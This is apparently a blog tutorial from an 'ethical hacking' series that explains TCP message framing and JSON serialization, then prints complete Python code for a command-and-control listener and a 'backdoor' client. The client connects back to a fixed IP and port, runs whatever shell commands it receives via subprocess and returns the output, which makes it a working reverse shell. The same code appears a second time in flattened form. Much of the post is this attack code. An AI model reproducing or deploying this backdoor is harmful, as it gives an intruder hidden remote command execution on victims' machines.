Python Ethical Hacking - BACKDOORS(3)
BACKDOORS Sockets
Problem:
- TCP is stream-based.
- Difficult to identify the end of message/batch.
Solution:
- Make sure the message is well defined.
- Implement a protocol that sends and receives methods conform to.
- Send the size of the message as a header.
- Append an end-of-message mark to the end of each message.
- Serialize the message.
BACKDOORS Serialization
Benefits:
- Message is well defined, receiver knows if message is incomplete.
- Can be used to transfer objects(lists, dicts ...etc)
Implementation:
- JSON and Pickle are common solutions.
- JSON(Javascript Object Notation) is implemented in many programming languages.
- Represents objects as text.
- Widely used when transferring data between clients and servers.
Server Side - Listener Code:
#!/usr/bin/env python
import socket
import json class Listener:
def __init__(self, ip, port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind((ip, port))
listener.listen(0)
print("[+] Waiting for incoming connections")
self.connection, address = listener.accept()
print("[+] Got a connection from " + str(address)) def reliable_send(self, data):
json_data = json.dumps(data).encode()
self.connection.send(json_data) def reliable_receive(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1024).decode()
return json.loads(json_data)
except ValueError:
continue def execute_remotely(self, command):
self.reliable_send(command.decode())
return self.reliable_receive() def run(self):
while True:
command = input(">> ").encode()
result = self.execute_remotely(command)
print(result) my_listener = Listener("10.0.0.43", 4444)
my_listener.run()
Client Side - Backdoor code:
#!/usr/bin/env python
import json
import socket
import subprocess class Backdoor:
def __init__(self, ip, port):
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port)) def reliable_send(self, data):
json_data = json.dumps(data).encode()
self.connection.send(json_data) def reliable_receive(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1024).decode()
return json.loads(json_data)
except ValueError:
continue def execute_system_command(self, command):
return subprocess.check_output(command, shell=True) def run(self):
while True:
command = self.reliable_receive()
command_result = self.execute_system_command(command)
self.reliable_send(command_result.decode())
connection.close() my_backdoor = Backdoor("10.0.0.43", 4444)
my_backdoor.run()
Execute result:
#!/usr/bin/env pythonimport jsonimport socketimport subprocess
class Backdoor: def __init__(self, ip, port): self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.connection.connect((ip, port))
def reliable_send(self, data): json_data = json.dumps(data).encode() self.connection.send(json_data)
def reliable_receive(self): json_data = "" while True: try: json_data = json_data + self.connection.recv(1024).decode() return json.loads(json_data) except ValueError: continue
def execute_system_command(self, command): return subprocess.check_output(command, shell=True)
def run(self): while True: command = self.reliable_receive() command_result = self.execute_system_command(command) self.reliable_send(command_result.decode()) connection.close()
my_backdoor = Backdoor("10.0.0.43", 4444)my_backdoor.run()
最新文章
- MVVM大比拼之AngularJS源码精析
- JavaScript闭包浅谈
- 连接数据库——模拟ATM机查、存、取、开户功能
- SQL语句在OLAP的妙用(多维分析与指标计算)
- PHP的线程安全与非线程安全版本的区别
- DWZ框架学习一
- 使用Keil软件编写汇编源程序应注意事项
- js 数组排除重复值(string)
- 基于JAVA WEB技术旅游服务网站系统设计与实现网上程序代写
- HTTP协议中返回代码302的情况
- 广州图书馆借阅抓取——httpClient的使用
- SSM框架-MyBatis框架数据库的增删查改操作
- 多个Tomcat之间实现Session共享
- 用Java操作数据库Datetime数据
- SMINT:单页网站的免費jQuery插件
- Office Visio 201*安装详细步骤并激活
- ise和modelsim联合仿真的一些准备
- Python 中的线程-进程2
- postman全方位讲解(有空看下)
- BETA阶段冲刺